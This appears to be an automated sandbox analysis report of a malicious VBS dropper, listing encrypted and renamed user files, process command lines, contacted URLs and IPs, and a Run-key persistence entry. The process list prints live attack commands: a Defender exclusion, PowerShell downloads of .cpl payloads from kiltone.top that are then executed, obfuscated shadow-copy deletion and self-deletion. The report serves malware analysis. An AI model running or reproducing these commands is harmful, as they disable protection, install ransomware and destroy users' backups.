C:\Users\user\Desktop\BQJUWOYRTO.jpg.IqMW (copy)
data
dropped
C:\Users\user\Desktop\BUFZSQPCOH.png.NBWw (copy)
data
dropped
C:\Users\user\Desktop\BWETZDQDIB.mp3.rFzU (copy)
data
dropped
C:\Users\user\Desktop\GNLQNHOLWB.mp3.Lbza (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV.docx.PeLY (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV.jpg.VpGc (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV.xlsx.yYUH (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV\BQJUWOYRTO.jpg.atnv (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV\BUFZSQPCOH.png.tYxa (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV\BWETZDQDIB.mp3.JYpC (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV\HMPPSXQPQV.docx.guar (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.pdf
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV\LHEPQPGEWF.pdf.HYRw (copy)
data
dropped
C:\Users\user\Desktop\HMPPSXQPQV\QFAPOWPAFG.xlsx.CWZi (copy)
data
dropped
C:\Users\user\Desktop\HQJBRDYKDE.png.OfAq (copy)
data
dropped
C:\Users\user\Desktop\LFOPODGVOH.docx
data
dropped
C:\Users\user\Desktop\LFOPODGVOH.docx.RHmK (copy)
data
dropped
C:\Users\user\Desktop\LFOPODGVOH.xlsx.UeMf (copy)
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\HMPPSXQPQV.xlsx.UaxH (copy)
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\HQJBRDYKDE.png
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\HQJBRDYKDE.png.LgrX (copy)
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\LFOPODGVOH.docx
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\LFOPODGVOH.docx.SaHb (copy)
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\LHEPQPGEWF.mp3.XmnB (copy)
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\QFAPOWPAFG.jpg.vkDU (copy)
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\VWDFPKGDUF.pdf
data
dropped
C:\Users\user\Desktop\LFOPODGVOH\VWDFPKGDUF.pdf.sjrJ (copy)
data
dropped
C:\Users\user\Desktop\LHEPQPGEWF.jpg
data
dropped
C:\Users\user\Desktop\LHEPQPGEWF.jpg.YDun (copy)
data
dropped
C:\Users\user\Desktop\LHEPQPGEWF.mp3.LjtE (copy)
data
dropped
C:\Users\user\Desktop\LHEPQPGEWF.pdf
OpenPGP Secret Key
dropped
C:\Users\user\Desktop\LHEPQPGEWF.pdf.PJxs (copy)
OpenPGP Secret Key
dropped
C:\Users\user\Desktop\LIJDSFKJZG.docx.NTIB (copy)
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG.pdf.tnWO (copy)
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG\GNLQNHOLWB.mp3.oPva (copy)
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG\LHEPQPGEWF.jpg
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG\LHEPQPGEWF.jpg.qFLQ (copy)
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG\LIJDSFKJZG.docx.FDqX (copy)
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG\PWZOQIFCAN.png.fEen (copy)
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG\SNIPGPPREP.pdf.iHFW (copy)
data
dropped
C:\Users\user\Desktop\LIJDSFKJZG\VWDFPKGDUF.xlsx.bwJP (copy)
data
dropped
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs.cpHo (copy)
data
dropped
C:\Users\user\Desktop\PWZOQIFCAN.png
data
dropped
C:\Users\user\Desktop\PWZOQIFCAN.png.rzdD (copy)
data
dropped
C:\Users\user\Desktop\QFAPOWPAFG.jpg.rjgv (copy)
data
dropped
C:\Users\user\Desktop\QFAPOWPAFG.xlsx
data
dropped
C:\Users\user\Desktop\QFAPOWPAFG.xlsx.Iftn (copy)
data
dropped
C:\Users\user\Desktop\SNIPGPPREP.pdf.qHBF (copy)
data
dropped
C:\Users\user\Desktop\UNKRLCVOHV.docx
data
dropped
C:\Users\user\Desktop\UNKRLCVOHV.docx.KdeN (copy)
data
dropped
C:\Users\user\Desktop\UNKRLCVOHV\HMPPSXQPQV.jpg.fPHC (copy)
data
dropped
C:\Users\user\Desktop\UNKRLCVOHV\LFOPODGVOH.xlsx.vZmS (copy)
data
dropped
C:\Users\user\Desktop\UNKRLCVOHV\LIJDSFKJZG.pdf
data
dropped
C:\Users\user\Desktop\UNKRLCVOHV\LIJDSFKJZG.pdf.vXMS (copy)
data
dropped
C:\Users\user\Desktop\UNKRLCVOHV\UNKRLCVOHV.docx.NjkO (copy)
data
dropped
C:\Users\user\Desktop\UNKRLCVOHV\VWDFPKGDUF.mp3
OpenPGP Public Key
dropped
C:\Users\user\Desktop\UNKRLCVOHV\VWDFPKGDUF.mp3.DrwF (copy)
OpenPGP Public Key
dropped
C:\Users\user\Desktop\VWDFPKGDUF.mp3
data
dropped
C:\Users\user\Desktop\VWDFPKGDUF.mp3.Ejpl (copy)
data
dropped
C:\Users\user\Desktop\VWDFPKGDUF.pdf.ELgz (copy)
data
dropped
C:\Users\user\Desktop\VWDFPKGDUF.xlsx.ujhP (copy)
data
dropped
C:\Users\user\Documents\AQRFEVRTGL.png.cYvT (copy)
data
dropped
C:\Users\user\Documents\BQJUWOYRTO.jpg.yiRS (copy)
data
dropped
C:\Users\user\Documents\BUFZSQPCOH.png.ZuiF (copy)
data
dropped
C:\Users\user\Documents\BWETZDQDIB.mp3
data
dropped
C:\Users\user\Documents\BWETZDQDIB.mp3.sITu (copy)
data
dropped
C:\Users\user\Documents\GNLQNHOLWB.mp3.ZjOU (copy)
data
dropped
C:\Users\user\Documents\HMPPSXQPQV.docx.Kzvg (copy)
data
dropped
C:\Users\user\Documents\HMPPSXQPQV.jpg.qprS (copy)
data
dropped
C:\Users\user\Documents\HMPPSXQPQV.xlsx.QVHr (copy)
data
dropped
C:\Users\user\Documents\HMPPSXQPQV\BQJUWOYRTO.jpg
data
dropped
C:\Users\user\Documents\HMPPSXQPQV\BQJUWOYRTO.jpg.enby (copy)
data
dropped
C:\Users\user\Documents\HMPPSXQPQV\BUFZSQPCOH.png.sUKE (copy)
data
dropped
C:\Users\user\Documents\HMPPSXQPQV\BWETZDQDIB.mp3.mMNI (copy)
data
dropped
C:\Users\user\Documents\HMPPSXQPQV\HMPPSXQPQV.docx.zVPg (copy)
data
dropped
C:\Users\user\Documents\HMPPSXQPQV\LHEPQPGEWF.pdf.dyuZ (copy)
OpenPGP Public Key
dropped
C:\Users\user\Documents\HMPPSXQPQV\QFAPOWPAFG.xlsx.QUcN (copy)
data
dropped
C:\Users\user\Documents\HQJBRDYKDE.png.tTVf (copy)
data
dropped
C:\Users\user\Documents\LFOPODGVOH.docx
data
dropped
C:\Users\user\Documents\LFOPODGVOH.docx.IKPD (copy)
data
dropped
C:\Users\user\Documents\LFOPODGVOH.xlsx
data
dropped
C:\Users\user\Documents\LFOPODGVOH.xlsx.xWNT (copy)
data
dropped
C:\Users\user\Documents\LFOPODGVOH\HMPPSXQPQV.xlsx
data
dropped
C:\Users\user\Documents\LFOPODGVOH\HMPPSXQPQV.xlsx.MJzX (copy)
data
dropped
C:\Users\user\Documents\LFOPODGVOH\HQJBRDYKDE.png.uXJd (copy)
data
dropped
C:\Users\user\Documents\LFOPODGVOH\LFOPODGVOH.docx.VqMu (copy)
OpenPGP Secret Key
dropped
C:\Users\user\Documents\LFOPODGVOH\LHEPQPGEWF.mp3
data
dropped
C:\Users\user\Documents\LFOPODGVOH\LHEPQPGEWF.mp3.vYJu (copy)
data
dropped
C:\Users\user\Documents\LFOPODGVOH\QFAPOWPAFG.jpg
data
dropped
C:\Users\user\Documents\LFOPODGVOH\QFAPOWPAFG.jpg.xGvQ (copy)
data
dropped
C:\Users\user\Documents\LFOPODGVOH\VWDFPKGDUF.pdf
data
dropped
C:\Users\user\Documents\LFOPODGVOH\VWDFPKGDUF.pdf.zRdV (copy)
data
dropped
C:\Users\user\Documents\LHEPQPGEWF.jpg
data
dropped
C:\Users\user\Documents\LHEPQPGEWF.jpg.CNhZ (copy)
data
dropped
C:\Users\user\Documents\LHEPQPGEWF.mp3.XGOT (copy)
data
dropped
C:\Users\user\Documents\LHEPQPGEWF.pdf
data
dropped
C:\Users\user\Documents\LHEPQPGEWF.pdf.IAVc (copy)
data
dropped
C:\Users\user\Documents\LIJDSFKJZG.docx
data
dropped
C:\Users\user\Documents\LIJDSFKJZG.docx.iDnU (copy)
data
dropped
C:\Users\user\Documents\LIJDSFKJZG.pdf.buHx (copy)
data
dropped
C:\Users\user\Documents\LIJDSFKJZG\GNLQNHOLWB.mp3.xENX (copy)
data
dropped
C:\Users\user\Documents\LIJDSFKJZG\LHEPQPGEWF.jpg
data
dropped
C:\Users\user\Documents\LIJDSFKJZG\LHEPQPGEWF.jpg.IzkW (copy)
data
dropped
C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx.oCdV (copy)
PGP Secret Sub-key -
dropped
C:\Users\user\Documents\LIJDSFKJZG\PWZOQIFCAN.png.YaBs (copy)
OpenPGP Secret Key
dropped
C:\Users\user\Documents\LIJDSFKJZG\SNIPGPPREP.pdf
data
dropped
C:\Users\user\Documents\LIJDSFKJZG\SNIPGPPREP.pdf.YedO (copy)
data
dropped
C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.xlsx
data
dropped
C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.xlsx.gEJq (copy)
data
dropped
C:\Users\user\Documents\PWZOQIFCAN.png.Kkto (copy)
data
dropped
C:\Users\user\Documents\QFAPOWPAFG.jpg
data
dropped
C:\Users\user\Documents\QFAPOWPAFG.jpg.kKOY (copy)
data
dropped
C:\Users\user\Documents\QFAPOWPAFG.xlsx.mQZq (copy)
data
dropped
C:\Users\user\Documents\SNIPGPPREP.pdf.iwpd (copy)
data
dropped
C:\Users\user\Documents\UNKRLCVOHV.docx.cypm (copy)
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\AQRFEVRTGL.png
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\AQRFEVRTGL.png.nDFw (copy)
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\HMPPSXQPQV.jpg.isFn (copy)
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\LFOPODGVOH.xlsx
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\LFOPODGVOH.xlsx.HtAb (copy)
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\LIJDSFKJZG.pdf
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\LIJDSFKJZG.pdf.xEaD (copy)
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\UNKRLCVOHV.docx.aPpg (copy)
data
dropped
C:\Users\user\Documents\UNKRLCVOHV\VWDFPKGDUF.mp3.zWQe (copy)
data
dropped
C:\Users\user\Documents\VWDFPKGDUF.mp3.cWEJ (copy)
data
dropped
C:\Users\user\Documents\VWDFPKGDUF.pdf
data
dropped
C:\Users\user\Documents\VWDFPKGDUF.pdf.lYth (copy)
data
dropped
C:\Users\user\Documents\VWDFPKGDUF.xlsx
data
dropped
C:\Users\user\Documents\VWDFPKGDUF.xlsx.gPdX (copy)
data
dropped
C:\Users\user\Downloads\203bc979-cd5e-4f09-aae9-7003f9ad3c6e.tmp
PDF document, version 1.6 (zip deflate encoded)
dropped
C:\Users\user\Downloads\99044015-9ccc-4f82-9a07-de08dfe21d12.tmp
PDF document, version 1.6 (zip deflate encoded)
dropped
C:\Users\user\Downloads\AQRFEVRTGL.png
data
dropped
C:\Users\user\Downloads\AQRFEVRTGL.png.yWQt (copy)
data
dropped
C:\Users\user\Downloads\BQJUWOYRTO.jpg
data
dropped
C:\Users\user\Downloads\BQJUWOYRTO.jpg.hTjf (copy)
data
dropped
C:\Users\user\Downloads\BUFZSQPCOH.png.CzNe (copy)
data
dropped
C:\Users\user\Downloads\BWETZDQDIB.mp3.wHns (copy)
data
dropped
C:\Users\user\Downloads\GNLQNHOLWB.mp3.ybDU (copy)
data
dropped
C:\Users\user\Downloads\HMPPSXQPQV.docx.efuP (copy)
data
dropped
C:\Users\user\Downloads\HMPPSXQPQV.jpg.plfr (copy)
data
dropped
C:\Users\user\Downloads\HMPPSXQPQV.xlsx
PGP Secret Sub-key -
dropped
C:\Users\user\Downloads\HMPPSXQPQV.xlsx.EenZ (copy)
PGP Secret Sub-key -
dropped
C:\Users\user\Downloads\HQJBRDYKDE.png.eTLY (copy)
data
dropped
C:\Users\user\Downloads\LFOPODGVOH.docx.ciIl (copy)
data
dropped
C:\Users\user\Downloads\LFOPODGVOH.xlsx.Rmcs (copy)
data
dropped
C:\Users\user\Downloads\LHEPQPGEWF.jpg.XrhQ (copy)
Dyalog APL aplcore version -21.-102
dropped
C:\Users\user\Downloads\LHEPQPGEWF.mp3
data
dropped
C:\Users\user\Downloads\LHEPQPGEWF.mp3.gHNv (copy)
data
dropped
C:\Users\user\Downloads\LHEPQPGEWF.pdf.jQaV (copy)
data
dropped
C:\Users\user\Downloads\LIJDSFKJZG.docx.WyOm (copy)
data
dropped
C:\Users\user\Downloads\LIJDSFKJZG.pdf
data
dropped
C:\Users\user\Downloads\LIJDSFKJZG.pdf.Ctho (copy)
data
dropped
C:\Users\user\Downloads\PWZOQIFCAN.png.uFGd (copy)
data
dropped
C:\Users\user\Downloads\QFAPOWPAFG.jpg.HBjx (copy)
data
dropped
C:\Users\user\Downloads\QFAPOWPAFG.xlsx.agRF (copy)
data
dropped
C:\Users\user\Downloads\SNIPGPPREP.pdf
data
dropped
C:\Users\user\Downloads\SNIPGPPREP.pdf.LRxo (copy)
data
dropped
C:\Users\user\Downloads\UNKRLCVOHV.docx.ZgLw (copy)
data
dropped
C:\Users\user\Downloads\VWDFPKGDUF.mp3.zuWD (copy)
data
dropped
C:\Users\user\Downloads\VWDFPKGDUF.pdf
data
dropped
C:\Users\user\Downloads\VWDFPKGDUF.pdf.RwZL (copy)
data
dropped
C:\Users\user\Downloads\VWDFPKGDUF.xlsx
data
dropped
C:\Users\user\Downloads\VWDFPKGDUF.xlsx.dRIb (copy)
data
dropped
C:\Users\user\Downloads\downloaded.pdf.crdownload
PDF document, version 1.6 (zip deflate encoded)
dropped
C:\Users\user\Downloads\downloaded.pdf.iqBn (copy)
data
dropped
C:\Users\user\Favorites\Amazon.url.RMKT (copy)
OpenPGP Secret Key
dropped
C:\Users\user\Favorites\Bing.url.IcKf (copy)
data
dropped
C:\Users\user\Favorites\Facebook.url.kvno (copy)
data
dropped
C:\Users\user\Favorites\Google.url
data
dropped
C:\Users\user\Favorites\Google.url.BgnI (copy)
data
dropped
C:\Users\user\Favorites\Live.url.zNJf (copy)
OpenPGP Secret Key
dropped
C:\Users\user\Favorites\NYTimes.url.ctSi (copy)
data
dropped
C:\Users\user\Favorites\Reddit.url
data
dropped
C:\Users\user\Favorites\Reddit.url.VoUx (copy)
data
dropped
C:\Users\user\Favorites\Twitter.url.aory (copy)
data
dropped
C:\Users\user\Favorites\Wikipedia.url.mszi (copy)
OpenPGP Secret Key
dropped
C:\Users\user\Favorites\Youtube.url.mNjl (copy)
data
dropped
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms.pLvf (copy)
data
dropped
C:\Users\user\ntuser.ini.tbeA (copy)
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
Chrome Cache Entry: 592
HTML document, ASCII text, with very long lines (6862)
downloaded
Chrome Cache Entry: 593
PDF document, version 1.6 (zip deflate encoded)
downloaded
\Device\Null
ASCII text, with CRLF line terminators
dropped
There are 825 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS_1.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp'
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell start-process https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/rwcla.cpl -Outfile $env:tmp\\fjeljies.cpl
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2000,i,4385509434330054281,2454780159223617298,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c control C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
malicious
C:\Windows\System32\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
malicious
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
malicious
C:\Windows\SysWOW64\cmd.exe
cmd /c %temp%/eryy65ty.exe
malicious
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
C:\Users\user~1\AppData\Local\Temp/eryy65ty.exe
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\jExFKd\jExF\..\..\Windows\jExF\jExF\..\..\system32\jExF\jExF\..\..\wbem\jExF\jExFK\..\..\wmic.exe shadowcopy delete
malicious
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
"C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\qYxiJv\qYxi\..\..\Windows\qYxi\qYxi\..\..\system32\qYxi\qYxi\..\..\wbem\qYxi\qYxiJ\..\..\wmic.exe shadowcopy delete
malicious
C:\Users\user\AppData\Local\Temp\eryy65ty.exe
"C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\DgeFGH\DgeF\..\..\Windows\DgeF\DgeF\..\..\system32\DgeF\DgeF\..\..\wbem\DgeF\DgeFG\..\..\wmic.exe shadowcopy delete
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\xMvAnp\xMvA\..\..\Windows\xMvA\xMvA\..\..\system32\xMvA\xMvA\..\..\wbem\xMvA\xMvAn\..\..\wmic.exe shadowcopy delete
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\mCMXKV\mCMX\..\..\Windows\mCMX\mCMX\..\..\system32\mCMX\mCMX\..\..\wbem\mCMX\mCMXK\..\..\wmic.exe shadowcopy delete
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
malicious
C:\Windows\System32\wbem\WMIC.exe
c:\mZDBzN\mZDB\..\..\Windows\mZDB\mZDB\..\..\system32\mZDB\mZDB\..\..\wbem\mZDB\mZDBz\..\..\wmic.exe shadowcopy delete
malicious
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user~1\AppData\Local\Temp\eryy65ty.exe"
malicious
C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\control.exe
control C:\Users\user~1\AppData\Local\Temp/fjeljies.cpl
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\notepad.exe
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 40 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://kiltone.top/ste
unknown
malicious
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf
malicious
https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b443
unknown
malicious
https://kiltone.top/stelin/Gosjeufon.cpl
45.125.67.168
malicious
https://kiltone.top/stelin/rwcla.cpl
45.125.67.168
malicious
https://www.oldmutual.co.za/v3/assets/blt0
unknown
malicious
https://kiltone.top/stelin/rwcla.
unknown
malicious
https://www.avito.ru/
unknown
https://digify.com/a/#/access/login
unknown
https://www.ctrip.com/
unknown
https://www.leboncoin.fr/
unknown
https://kiltone.top/stelin/Gosjeufon.cpl-Outfile$env:tmp
unknown
https://account.bellmedia.c
unknown
https://weibo.com/
unknown
https://login.microsoftonline.com
unknown
https://www.ifeng.com/
unknown
https://www.zhihu.com/
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://www.msn.com
unknown
https://www.oldmutual.co.za/favicon.ico
18.161.69.16
https://www.reddit.com/
unknown
https://www.amazon.ca/
unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
unknown
https://www.ebay.co.uk/
unknown
file:///C:/Users/user/Downloads/downloaded.pdf
https://github.com/mozilla/webcompat-reporter
unknown
https://www.amazon.co.uk/
unknown
https://www.ebay.de/
unknown
https://screenshots.firefox.com/
unknown
https://www.amazon.com/
unknown
https://www.google.com/search?client=firefox-b-d&q=
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0
unknown
http://crl.ver)
unknown
http://ocsp.rootca1.amazontrust.com0:
unknown
https://www.wykop.pl/
unknown
https://twitter.com/
unknown
https://digify.com/a/#/access/logincmd
unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
unknown
https://www.olx.pl/
unknown
https://www.youtube.com/
unknown
https://allegro.pl/
unknown
https://support.mozilla.org/products/firefox
unknown
https://MD8.mozilla.org/1/m
unknown
https://www.bbc.co.uk/
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
https://bugzilla.mo
unknown
https://www.amazon.fr/
unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?
unknown
https://www.google.com/complete/
unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
unknown
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
unknown
https://support.mozilla.org
unknown
https://www.google.com/
unknown
https://www.iqiyi.com/
unknown
https://www.amazon.de/
unknown
https://www.baidu.com/
unknown
There are 48 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
d12y248af9ueom.cloudfront.net
18.161.69.16
www.google.com
172.217.19.228
kiltone.top
45.125.67.168
www.oldmutual.co.za
unknown

IPs

IP
Domain
Country
Malicious
172.217.19.228
www.google.com
United States
45.125.67.168
kiltone.top
Hong Kong
192.168.2.7
unknown
unknown
18.161.69.16
d12y248af9ueom.cloudfront.net
United States
239.255.255.250
unknown
Reserved
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
XPSUDTARW
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
